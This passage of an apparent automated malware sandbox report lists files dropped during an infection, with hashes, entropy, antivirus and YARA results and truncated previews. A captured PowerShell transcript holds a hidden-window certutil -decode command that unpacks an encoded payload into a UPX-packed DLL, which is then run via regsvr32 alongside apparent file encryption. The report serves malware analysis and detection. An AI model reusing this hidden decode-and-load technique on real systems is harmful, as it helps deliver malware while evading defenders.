              SHA-256:523E9CAE67A124E735949ACDE8C5EAE713C21A120EF844678BD54A1358205F0E
              SHA-512:FD8C6F23F1C29FD70CF81189BE6CBBFF563C2903F32B0FCFCFFAA42D6F90782FE297034640A433A7E591CFD6E149E349AAF84BC4EB7DAB04B03CDC958BBE5198
              Malicious:false
              Preview: ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\ProgramData\Software\ESTsoft\Common\list.ldb
              Process:C:\Windows\System32\regsvr32.exe
              File Type:data
              Category:dropped
              Size (bytes):20
              Entropy (8bit):4.221928094887362
              Encrypted:false
              SSDEEP:3:C5atdIT:g8dk
              MD5:5FEB4EF2BDB1DC5AAAF05C9085A76545
              SHA1:A788457DE6ED4DFCAD3AC917CBCD9F836310BDBE
              SHA-256:0DCED11D04886524C30ED03937C19FEF5D88588C207979596F25855A1B5FA250
              SHA-512:7CC648C69726DBBEA4983F1144FCC54641229E9B484FE58E42FC3F9B8EC401EFD4BD095CA964AC653BCD6F59C56366BD529099372AB883D88735A34AC4436DBB
              Malicious:false
              Preview: /........;...ql.
              C:\ProgramData\efVo8cq.sIhn
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):259416
              Entropy (8bit):5.962875804998698
              Encrypted:false
              SSDEEP:6144:9vAIZ4vrucGjFPqQC0uNRwTIfAl69/1el0thoSvCeGrJAGyi0/xe:avrNGjFP9C0unwIAlL0ta6GrJ0Zxe
              MD5:184188B0C846FAB897E0F95E596A6D7C
              SHA1:F5C265A92F919A3372053F6D2B4E057E1B33A992
              SHA-256:CF605E3BB8181ED066B3750917A6244B599B5350F758AFCCB77EF244948A4FF0
              SHA-512:415099EDDCE21E792F72F84D7BD1FEF2BA47CC53A20071B1FEB935E6AA8815E2F5DFFE4AFFC85C8B13BC5318468BBD485DE4F5FFCA0707B6178CDEC6B74EC243
              Malicious:false
              Preview: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADawJETnqH/QJ6h/0Ceof9Axcn8QZWh/0DFyfpBK6H/QMXJ/kGZof9AnqH+QB2h/0AAAThAnKH/QFXO+0GOof9AVc78QZSh/0DFyftBjaH/QFXO+kHWof9AGNH2Qdih/0AY0f9Bn6H/QBjRAECfof9AGNH9QZ+h/0BSaWNonqH/QAAAAAAAAAAAAAAAAAAAAABQRQAAZIYDAPhIkmAAAAAAAAAAAPAAIiALAg4aAPACAAAQAAAAAAUAMPsHAAAQBQAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAAAQCAAAEAAAAAAAAAIAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAA4AIIAMAAAADcAQgABAEAAAAACADcAQAAAHAHAAQpAAAAAAAAAAAAAKADCAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI/QcAMAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAAAABQAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADgVVBYMQAAAAAA8AIAABAFAADwAgAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAAAACAAABAAAAPQCAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
              C:\ProgramData\glK7UwV.pR9a
              Process:C:\Windows\System32\certutil.exe
              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
              Category:dropped
              Size (bytes):194560
              Entropy (8bit):7.923746161712757
              Encrypted:false
              SSDEEP:3072:skV6k74dhL0o0oqRT3vnkyVFTUwpsP+wqnsWtIN0KZehS5kxXhJhzYs/Hy9ehqk2:JR8rL0nn3vkyVFoVQZKZew5uXhJ+gy02
              MD5:14E01ED4D086206D3C4B7159DC887F25
              SHA1:2918B5AF300E979593DF44696E947DA396018532
              SHA-256:0A4F2CFF4D4613C08B39C9F18253AF0FD356697368EECDDF7C0FA560386377E6
              SHA-512:ED9A19513F27D40620C38EA9A18CAE3A8B806CDD6ACFA44D9FFF58FAEFD23D2D085E382B10412A01F6672304CBFB3D01AEDAFCF8DE7AB41E3CAFFDF069BD88E6
              Malicious:true
              Antivirus:
              • Antivirus: Metadefender, Detection: 32%, Browse
              • Antivirus: ReversingLabs, Detection: 68%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............@...@...@...A...@...A+..@...A...@...@...@..8@...@U..A...@U..A...@...A...@U..A..@...A..@...A...@...@...@...A...@Rich...@................PE..d....H.`.........." ................0.....................................................`..................................................................p...)......................................................0...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................3.96.UPX!.$..
              C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt
              Process:C:\Windows\System32\regsvr32.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):1218
              Entropy (8bit):5.24508468582021
              Encrypted:false
              SSDEEP:24:BxSAF3RCvi3OQx2DOXUWeWH0jeuKK6X4CIym1ZJXANZnxSAZx:BZBRCvqOQoOpHCKYB1ZOZZx
              MD5:1FC1A6A9D49B7BE9CD7323F6B46A5C4A
              SHA1:C56FC949EDBA224809EB44C8492FF3191F71CC68
              SHA-256:427DF863E391AC0A99BA6E457089B03CFE31DAB2DAA506063E4952136C8EAD0B
              SHA-512:AE8D7A1AB33A7B9E5E21A9BFFF6E6DB5C3A95E3AEAAB8127699FD5DD5AEFCE7A6A89EB7EEFB5058DB72A8568F7468F1E0E49F4F14061E0CB1751DB46570A3CCD
              Malicious:false
              Yara Hits:
              • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt, Author: Florian Roth
              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210825105828..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a..Process ID: 304..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210825105828..**********************..PS>certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a..Input Length = 259416..Output Length = 194560..CertUtil: -decode command completed successful
              C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt.enc
              Process:C:\Windows\System32\regsvr32.exe
              File Type:data
              Category:dropped
              Size (bytes):920
              Entropy (8bit):7.8108254057081945
              Encrypted:false
              SSDEEP:24:QhOrzg2T8BqO3WUaHFI0woFkk8W0v810LU455:wQQ4BwoFXHF0LX
              MD5:56221094A71390B5822C1D73879A15F1
              SHA1:491DCED7BD65C1D3F56EE6513066C027F48C2EED
              SHA-256:72547BCD82E273A3F82972BC079DF5B2CB7A2FE934354E27F24008DE8B14562D
              SHA-512:8B23AFC1DA9276928CF1100F3D7B5171E9B13DB0347A8A1B4BFC2AD9C95C2992969FA74E4791583026863E427184F814C60CA0726FBCC43BEE74DD50BF8986FC
              Malicious:false
              Preview: .......H4....+v..Su..%..P....../. .......[..\.*...../.....A.Q.j.t....4..0.[w.,._...c.......q..f.Ep.h..Q............bm.'Z..XO...;.+...6........?c"2M.b...\.OAx...iA.:....0.<.F.w..jN..T.K..I.......7Y...>...VO.!...5...Y..m..+.....9@8...1..ZXo./.w?mn.).%...R.|.>..=.....v.J..Zh....f.....v.p..@.....#S%9`?x......n.C.. .?.g...OCL..cqH.r..CF../..Q*..HE.k.$].k]...`3X..d.W..I.[.M..\Z.V.1..e}.C..bp..X......._%B..&....>4.K...c8.. ...u..<.......E.e.....@J..|.U...w.x.#...7.kY.9.]....t8-duS<.[..C..5..o..i..{g4..b...N.........*..l..8_.V4;...E.UR......kGj.~..qH...~.....>8...P.Z[...'.hG._..tM.tmq...........{.....e.....0.5./....N..09...d,f.qV.g5Z.K.|.0..(.QZ.^?h...p.p,..Y..5..n...= .XL.K...JHsn.z.#.d....f...t.,St..c.....k..+..q4.....'..1.....I.0,.+$.]$...>E...ZU.2`.33.~8D}.xB*@8.......A 0.*.....Jd))QIz3h..MPhL.z......0x.....w..Z...f........... ..D..........D>9."B....5#.%.%...e..N.H...
              C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:PDF document, version 1.7
              Category:dropped
              Size (bytes):961
              Entropy (8bit):7.8028574613021675
              Encrypted:false
              SSDEEP:24:Yc06du3AHebtA4U7YovrhEyu11/cWOFHRtn7IWau0rQWukR:y6duX85eyu1x+R9au0rQW1
              MD5:75230310CBF0CC4217481684C1AB7065
              SHA1:8601C7A8E09BB0F3F9BFBD585225BE923C66E0F7
              SHA-256:177BB2A1C42FF7B13211EC0658B5BD42A37156AD8236589059D2725966C3CB68
              SHA-512:3789F5AE891D818E02C8D19A36FE3227CDD61E2DE676893C8C4564FDB6E747F28607396DB884D2148A4B15BC84612BAB3B0B622A4029D35FA9D572EF95F2D69B
              Malicious:false
              Preview: %PDF-1.7..4 0 obj......Y..<..W....6.I..Y...Rv.A.0..+b......Z.....;Di.v].[#.R.....wIS.n....&`...L,T..|V....jM7.y.N.=......4.....(.eZc.'..gH.^.BK....F.a[)n.......@l.6...Ik.W9....4+...T&.`I].D.E........!.i4..O ...M...?^.u.....wY4or.A.g8q..(....T.vL.W.....ZJ...q1.X`..S..f...A.$..p}......`...L......b..P.k..Nps....T.!.#....%.L@..r0..{&....Y.`...w...d....V.O}.N.&A?.....D.v..m.<.A..h...\~.21...dQ.Ug....\...q+..S>...n..hP.Z-..C.....(......~..q.}(..}.^W3<_..)Vc.C-X..ID.......h.....U...@J.T...N.jS..nW..n..H..m..-t..o.w.'...'|M...W..V.r...+g..R..(5].<.....o...n...._......@.=..\|.b...H(.].i..{..=-......<.gT.U...D..CZa.n.Q...?l....e.....g.l.....y. .....h.G(:3....qu..M.z0<.yH......Br....S`.<^..A.../L.SyP..6.?'......XB4+.|.:..#... ...Ye.....u.......A..]X.......,..^..t.t......1|-..'.t..+..Z....;.A....-...D...1.[..TQ.Ty....L..T.g....oj.F...?Ed...<........8.....l._.s.+./Ek..?......YV(cV...=..k...#j...r.N..2,b..|..th.'.c
              C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt.zip
              Process:C:\Windows\System32\regsvr32.exe
              File Type:Zip archive data, at least v2.0 to extract
              Category:dropped
              Size (bytes):900
              Entropy (8bit):7.3293489758039705
              Encrypted:false
              SSDEEP:12:5jlSrRn8N/SzLVgZFJgu+n5ul/XQ5xPSkOBAJ0e36M1udSrRtKKeSrRoaUL:9GESnVmf25fSxAb3cOt7Zo
              MD5:742409DB7A6DBD329A4DBDF2306FA993
              SHA1:034CB89ED8D2742B5B4A8325DE23E971671B7701
              SHA-256:AF4A7982E810EA3353A9F6846E65835CCA7F7D0E0CE683F830ED6B2A8FF95323
              SHA-512:EA9873FA847CBFA527D3791157C5F1D042CAFD0F586F771348A11A1049D69539883C4F97B0B3534B62A081CC43451959CBADFF1352E4D407CBFF95CD3B26B095
              Malicious:false
              Preview: PK........PW.S............A...1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txtUT...G.&a..&a..&a.T..0..G.;..C[.......j..........M.`....)...C...P.XvWj.Z.9...3.7....o....g.3..h.vP......I...0H.V........y.......:K..dud0...Y...I...r&]g^.k.j\3....U..W.........o..v.F..<-.Vk..y...%.`zE...7..Ii...B...-B.(9..x..l}...$;.J1I.z..=.o.Z.#......2.(..T.... U.<O.q2+U^.....z.:...G.y.....r....\.FR......I`...r:(.1=)...3~.8..`TQ..j[X...N.t...w.._..6........u...O..M.}....<B...x......jBs.*.en...*q.{...%g..?\.Si...v...m.[.[&...6.l..Y.....H..A.........m..]e^.i7..y}Kgi.Dg>.I.].....*..f].......^l.\.{&....(+h.^~Q@f.3.4...oPK........PW.S..G.........A...1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txtUT...G.&a..&a..&aPK..........PW.S..G.........A......... .......1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txtUT...G.&aPK..........x.........
              C:\ProgramData\temp\1C75.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\2330.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\27CE.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\3092.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\3AED.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\3AED.tmp.enc
              Process:C:\Windows\System32\regsvr32.exe
              File Type:data
              Category:dropped
              Size (bytes):45582
              Entropy (8bit):7.9957540140020535
              Encrypted:true
              SSDEEP:768:a0Lv1svI3HzuTApqUiyzs3CtPEInQH8UcjmbPjeGd3PqHlU50eJiTfX9E:xLrzuTyqUiyzhPE4mbzRVPWE
              MD5:7D65BE4E5C388D53C25E5B60626A2390
              SHA1:057C0F706CDB5826A205D6D3F4D0C5A988159078
              SHA-256:21824CA7A5AE455F3B1CE9FF18E98D3087052EFCA4E8F5CCAAB0B81237DA5C57
              SHA-512:FA4E893CAA63DB29ABFA17890E3B071EBC5C76997DC61ED6DD00D3BB3FED38BF2F9489FCC10515E0F713C4DE65E87E64ACE99E8183139222BB902CC71A46C721
              Malicious:false
              Preview: ....U....<i....<.9.IA....s...c...67.w...8F.:.p....$...I%ut...M..i#}'...0S.0-].x..~.4.m..b..../..W.Z|.V..8..-.g.q...D.?p{.eLp.vn.%Jr.....n.xz!..L..1U..........|l..._.p,.{<..m}...j.e.....K.t.....r...7..uw....m_...z.a..9.|.(.Q>.........B=<a..t"...WX..n.R}Mv..)kj..y.._(\o>....X.Lq...4..:.w!4.m0...N4].....$0.sd5.y.X"........gA...O..i......[..#..q.[[...?,.).z.6.m.Q.%...A.....<).;..;.4.n.Z.Nfj.j]:.Fr.~.......o..............I..4.[M$<.P..t..p......f..P5..'..la.r.y..jl...o.I...8.....?I,.g..F+......FR0....(......*V...[7<?.n^.@...-...q...JJ.F.Z.....ng#9.......{."U.y.....j...P.{...H.....5%...!M\.....J.D.m..k..p7..$mc..~..H..28...aUk........J.............RA..V..xs]......4..H...n..yP.;....@....0..]x........3.q....C...0..\.")..QT........\.O%.(...PHz%,.....E?.+X.....k.f..%.3D....[..BV...>k........qR..,..8=9..|...l....(..$=..li....J..T.q.Z?...?....}..>Q.s.K.3A[,M.....j..X..6!.tW..A...q...e...pWCFb.;.......mJf....S.}.g...B...I{r.v.|7...{q.....E.7..R
              C:\ProgramData\temp\3AED.tmp.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:PDF document, version 1.7
              Category:dropped
              Size (bytes):45623
              Entropy (8bit):7.996741836304097
              Encrypted:true
              SSDEEP:768:0Afq9jk3ooTGcYWbdMNXIF0iGemczb+ueTj9ct42c+pwK+dG3jfFH4RBKV41LRfH:rSk3ooTGgbuXIF7OcP94c62ngdqjSREQ
              MD5:86B6C3B388D07FE73E8F86A81DD25A86
              SHA1:8855593CEE5C48845837E97720DE8BEF4B67E006
              SHA-256:F0D96AB6E8F13006D378BC03C0ECBF08907247775CD2638BF5F782267C0E59A4
              SHA-512:5F639CD16B08A623DBE901BD951CDE3621FF0E1C5C9BA91F188DD9951B51012F1FF3EC9B5CC42731596B209A6061D9D3EDB04F43CB810956817F707B98D27E53
              Malicious:false
              Preview: %PDF-1.7..4 0 obj....!Xk.'.u..:.U..?0..k.r..V..}..'.+..R.nB.)+.g....S+G......3..mI{...(.v...D...*.K..............c.hF.{.NYD.a.?R...#X....C.U..f2.S)....`K.Hp..Q#y.ks|..1.}p..;S.._yTl.v.>.".....l..V.....Qt....a......U.D]a&.....`.X...*...4...M.P..Ro=...>ba0.;h.....pfE...ibm.....@.s......b.Aa.mMl....h."$C.{P.c_...(.[....;y..............;..%...;.3p...,....6.....o..B....H..{.|..J.7@..kz../...@.c...a.}E.'B`.3...3...>.P}...X..Z3evUm..-.X}.A...Y....?..s9.kq...:.y._T|NQ.Qj..{".@.C.....sj!....M9...z.J.V.....y........X.+.#QX.=.@....q6|Fe......p..x9.l....d..g{.y.5.a.9S.N....m.3......UQW.a.p...um>....j$X.........D.......#...%d/!p..2.l..P...ep..K.R..3..W4...Ww*..$i.....jR.o....=.2m...l........0uBy....-|.7.;W.........;.gF`.c.0-.5p....?...| .....C.#'A~'.:#..&/3.@..6|.ond..f.9.....[p......#../.X.9..0..h8L.........p..{.......7....kdl#7...o.r'.;...7..+.$i..o.x0<..........rX$p..[.N.{g.V.<.*/..(...a...#l.F...Y....K...9.C..NC...~...........%X.yR.cz.....,.y.i......
              C:\ProgramData\temp\3AED.tmp.zip
              Process:C:\Windows\System32\regsvr32.exe
              File Type:Zip archive data, at least v2.0 to extract
              Category:dropped
              Size (bytes):45505
              Entropy (8bit):7.9950314671331215
              Encrypted:true
              SSDEEP:768:yxaYbt+DENJCQhL7hehnSu9c0eUFW6gznohHFjdJFYWUSyuD3/QKHj6SgPadp9mH:SrbIDkoQhLwQuS0VFLgTopFjjFiuDY2G
              MD5:5593A579ABF389B578F880B5203688E3
              SHA1:2B964098AEC107900CADCC8CD9B45D14B188AD68
              SHA-256:BC0D49CF6619D3665A0A8E93203C332E8BE947F184F7C99FA0F64A926B64686D
              SHA-512:19398C3C33694A3DF9C4E110BA3070E8C09FD8588B99E16EB23086211B43C6E7CBBE0A2B4673D57BCFC89151551F4E39E2229B9B8C2EB6AC3295DF6D6C66B204
              Malicious:false
              Preview: PK........lW.S................3AED.tmpUT...{.&a{.&az.&a...XU..7.O...........A.q....K@..i....F...%.....>........>.{...5..1.1~c.1.f.>..Jr.r..........i...............A.....ASH.C.\...L....IJ..{...ih]XLFniy.m...w.=)E.y..@...3P3.13......6......`...h,(.,..N.....~....AA....# "!.@".a..P00.0pp.....H8......S..G....;.WPl6".TU;...W.n..`$d|.B"bZ:z.F&.^>~.A!i.Y9y.E%m.]=}.C#K+k.[;{.O/o..O|.B.........OHLz......._PXT\R]S[W.....cGgWwOo_........./+.k...[.;..ON.._\....._..f.. ....E.o......X.p.8.%5....Pq.!.J.fW.#Qsk}...C...B..i?Z..5,.......v...0P......-:_.....,.......d.q.......<&U..:UX.0;u.V.T..X...h...Ow/..U.\LM.6.~.....)'.'7...K...O...g.Z6.x0.<`.6.V.V..+.mz...KW...2v......s#G.Eqa qA.=P^..S.Y.K.xM.....C..SMB.....i..9.._N..r..T...%..hn....u...0.:#{,v:...G..pdj...P.Kmsl..W.h3.....a.AD.!...Ra.........?...x...|0....}....$....y.w?..]./...I.A.-....4..:.P...._..#=Z.B..Et.|f..)..g.0@L4......C...,Kg.}p..7v.f.Q.....:...._.*..;IK.V....W...J..0R..v...c.;.tb..`...V..u.>....}
              C:\ProgramData\temp\3BA1.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
